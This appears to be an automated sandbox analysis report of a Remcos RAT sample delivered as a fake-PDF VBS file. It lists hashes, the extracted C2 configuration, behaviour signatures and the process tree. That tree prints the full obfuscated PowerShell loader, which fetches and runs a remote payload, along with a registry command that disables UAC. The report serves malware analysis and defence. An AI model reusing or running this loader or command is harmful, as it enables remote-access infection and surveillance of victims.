Overview

overview

10

Static

static

1

IADOSOROZP...df.vbs

windows7-x64

10

IADOSOROZP...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 09:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IADOSOROZPOET28.11.2024pdf.vbs

  • Size

    33KB

  • MD5

    25a7df33e8fee89dfef3426080405533

  • SHA1

    3bb1b11f8b041a59a4e8c498c88bbeae17d5f182

  • SHA256

    9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f

  • SHA512

    71fc9d9b64dce6f66941e63567c5eb89f57fb1e9caefbdb9fcd2eb1bb2bde1a98a4b156196b91f47834561a3178bb22665b513edb6b440bf313a39ae63f87b50

  • SSDEEP

    768:AxuasGxaSoM5LC3gWamt6iNi+ehBhZ+2JZ/q367gTeVVh0krL3uS:SuasQo2GZU+ehB/+WIQEmf0k3J

Score
10/10
remcosremotehostdiscoveryevasionrattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45hq459.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZP0CQ6

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IADOSOROZPOET28.11.2024pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2652
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:320
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2204

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    fb4ca94c6603ce8183cb38e224e01d9b

    SHA1

    72d499cd0366756e01460847b5b54acbe2116d21

    SHA256

    adb40026427bd407aa341fb18791649b3a4b26eb69c2cb5cfa72d1565cf3af76

    SHA512

    5da3afba84c1f47fcd59bc2a851328c0b81cef74e7517a9ec409aae0e70cb6fb5cc01cca5fe8bf6daa0ae272316cb840254aa1fe76a2aefb6ab19e35c665718a

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    e653b3b5a5619ef9a75ba8a8c36657ab

    SHA1

    a08215ffc675cd67c214a8bb08ebc786c7a7dd45

    SHA256

    e83d46b08cc299c28f58726c95c8603d77f64378b520ff0f32f658654518fa4c

    SHA512

    f79c6236557022cc73ea97c7619142b73936a31ee12bf4eca799cd9aa83a0289c706977e1612a7a81fe64cee76b1a326ee5c0315cd1725afc4e4fdb7550699cb

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabE523.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar5C64.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RSQ2AVVP8CDPQTFYK8GP.temp
    Filesize

    7KB

    MD5

    a899497e950ff80f95cb4623e05a94e8

    SHA1

    fdb0a387d64a6a9525d01e60f1136ca9524eb5ad

    SHA256

    62b9fefc7ba5f073653dac3a13f2f6d807c6830cc4497bdd9d8b52a407b48252

    SHA512

    2268bc30c6cd8f390c0775343678e21083fb19d534e919c5b50cb54748f4e1c8082ef2c66ed88fc3487d8fc6a4f92a1586eafa8bff1b4e15701b70555ffb8064

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Skyggeboksningerne.Cha
    Filesize

    423KB

    MD5

    c1c6567f2739c2f038cdcb65ebee8a05

    SHA1

    e533d6a51fef763b4765cfc842d6f99e3937176a

    SHA256

    e4e15d42053d9d51a43c89b75aea7bd42a809d0a99535947219c208ff985b0eb

    SHA512

    175c6f4f3c60112c33c5fbeb5705291551edf6a39cab33bb0e48742de1bdb97ecdd2a8a25a39a4dfa4acc402d742a51c278961d966b489388c16480d7f3ebb88

    Download Submit

  • memory/288-60-0x0000000000900000-0x0000000001962000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/288-59-0x0000000000900000-0x0000000001962000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2572-36-0x0000000006780000-0x00000000078B9000-memory.dmp

    Filesize

    17.2MB

    Download

  • memory/2652-24-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2652-30-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2652-32-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2652-29-0x000007FEF58EE000-0x000007FEF58EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2652-27-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2652-26-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2652-25-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2652-22-0x0000000001C90000-0x0000000001C98000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2652-23-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2652-21-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2652-20-0x000007FEF58EE000-0x000007FEF58EF000-memory.dmp

    Filesize

    4KB

    Download